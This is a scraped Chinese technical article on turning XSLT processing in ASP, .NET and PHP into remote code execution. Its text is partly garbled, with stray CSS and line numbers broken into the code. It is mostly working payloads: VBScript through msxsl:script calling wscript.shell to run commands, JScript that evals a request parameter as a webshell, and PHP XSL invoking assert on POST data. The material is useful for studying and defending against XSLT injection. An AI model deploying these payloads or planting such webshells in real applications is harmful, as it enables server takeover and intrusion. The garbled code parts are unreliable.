【XML】
一、xml与xslt 相信所有人对xml都不陌生,其被广泛的应用于数据数据传输、保存与序列化中,是一种极为强大的数据格式。强大必然伴随着复杂,xml在发展中派生出了一系列标准,包括DTD、XSD、XDR、XPATH以及XSLT等。 XSLT全称为拓展样式表转换语言,其作用类似于css,通过指定的规则,将一个xml文档转换为另外的形式。指定的规则由另外一个xml文件描述,这个文件通常为xsl后缀。x
|
1
2
|
<?
xml
version
=
"1.0"
?>
<
root
>123</
root
>
|
2
3
4
5
6
<?
xml
version
=
'1.0'
?>
<
xsl:stylesheet
version
=
"1.0"
xmlns:xsl
=
"http://www.w3.org/1999/XSL/Transform"
>
<
xsl:template
match
=
"/root"
>
<
xsl:value-of
select
=
"string(.)"
/>
</
xsl:template
>
</
xsl:stylesheet
>
|
1
<?
xml
version
=
"1.0"
encoding
=
"UTF-16"
?>123
|
二、asp与xml
5
set xmldoc= Server.CreateObject("MSXML2.DOMDocument")
xmldoc.loadxml(xml)
set xsldoc= Server.CreateObject("MSXML2.DOMDocument")
xsldoc.loadxml(xslt)
response.write xmldoc.TransformNode(xsldoc)
|
<
xsl:stylesheet
version
=
"1.0"
xmlns:xsl
=
"http://www.w3.org/1999/XSL/Transform"
xmlns:msxsl
=
"urn:schemas-microsoft-com:xslt"
xmlns:zcg
=
"zcgonvh"
>
<
msxsl:script
language
=
"vbscript"
implements-prefix
=
"zcg"
>
<![CDATA[function xml(x):set a=createobject("wscript.shell"):set exec=a.Exec(x):xml=exec.stdout.readall&exec.stderr.readall:end function]]>
</
msxsl:script
>
<
xsl:template
match
=
"/root"
>
<
xsl:value-of
select
=
"zcg:xml(string(.))"
/>
</
xsl:template
>
</
xsl:stylesheet
>
<
root
>cmd /c dir</
root
>
三、.net与xml
6
7
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XslTransform xt = new XslTransform();
xt.Load(xsldoc);
xt.Transform(xmldoc,null);
|
XslCompiledTransform xct=new XslCompiledTransform();
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
xct.Transform(xmldoc,null,new MemoryStream());
7
8
<
msxsl:script
language
=
"JScript"
implements-prefix
=
"zcg"
>
function xml() {eval(System.Web.HttpContext.Current.Request.Item['a'],'unsafe');}
<
xsl:value-of
select
=
"zcg:xml()"
/>
</
xsl:stylesheet
>
|
未能找到类型“System.Web.HttpContext.Current.Request.Item”,是否缺少程序集引用?
默认情况下引用下列两个程序集:
System.dll
System.Xml.dll
Microsoft.VisualBasic.dll(如果脚本语言为 VB)
可以使用 msxsl:assembly 元素导入其他程序集。
8
9
<
msxsl:assembly
name
=
"mscorlib,Version=2.0.0.0,Culture=neutral,PublicKeyToken=b77a5c561934e089"
/>
<
msxsl:assembly
name
=
"System.Data,0) !important; border-radius: 0px; border: 0px currentColor; left: auto !important; top: auto !important; width: auto !important; height: auto !important; right: auto !important; bottom: auto !important; line-height: 1.1em !important; overflow: visible !important; font-size: 1em !important; vertical-align: baseline !important; float: none !important; white-space: pre !important; direction: ltr !important; box-sizing: content-box !important; box-shadow: none; background-image: none !important; -webkit-box-shadow: none;" class="line number6 index5 alt1">
<
msxsl:assembly
name
=
"System.Configuration,PublicKeyToken=b03f5f7f11d50a3a"
/>
<
msxsl:assembly
name
=
"System.Web,0) !important; border-radius: 0px; border: 0px currentColor; left: auto !important; top: auto !important; width: auto !important; height: auto !important; right: auto !important; bottom: auto !important; line-height: 1.1em !important; overflow: visible !important; font-size: 1em !important; vertical-align: baseline !important; float: none !important; white-space: pre !important; direction: ltr !important; box-sizing: content-box !important; box-shadow: none; background-image: none !important; -webkit-box-shadow: none;" class="line number8 index7 alt1">
function xml() {eval(System.Web.HttpContext.Current.Request.Item['a'],0) !important; border-radius: 0px; border: 0px currentColor; left: auto !important; top: auto !important; width: auto !important; height: auto !important; right: auto !important; bottom: auto !important; line-height: 1.1em !important; overflow: visible !important; font-size: 1em !important; vertical-align: baseline !important; float: none !important; white-space: pre !important; direction: ltr !important; box-sizing: content-box !important; box-shadow: none; background-image: none !important; -webkit-box-shadow: none;" class="line number9 index8 alt2">
</
msxsl:script
>
<
xsl:template
match
=
"/root"
>
<
xsl:value-of
select
=
"zcg:xml()"
/>
</
xsl:template
>
</
xsl:stylesheet
>
|
function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}
</
xsl:stylesheet
>
四、php与xml
<?
xml
version
=
"1.0"
encoding
=
"UTF-8"
?>
<
xsl:stylesheet
version
=
"1.0"
xmlns:xsl
=
"http://www.w3.org/1999/XSL/Transform"
xmlns:zcg
=
"http://php.net/xsl"
>
<
xsl:value-of
select
=
"zcg:function('assert',string(.))"
/>
</
xsl:stylesheet
>
<
root
>assert($_POST[a]);</
root
>
五、总结与其他
<?
xml-stylesheet
type
=
"text/xsl"
href
=
"http://host/template.xsl"
?>
原创声明
本站部分文章基于互联网的整理,我们会把真正“有用/优质”的文章整理提供给各位开发者。本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
服务热线 19970861797
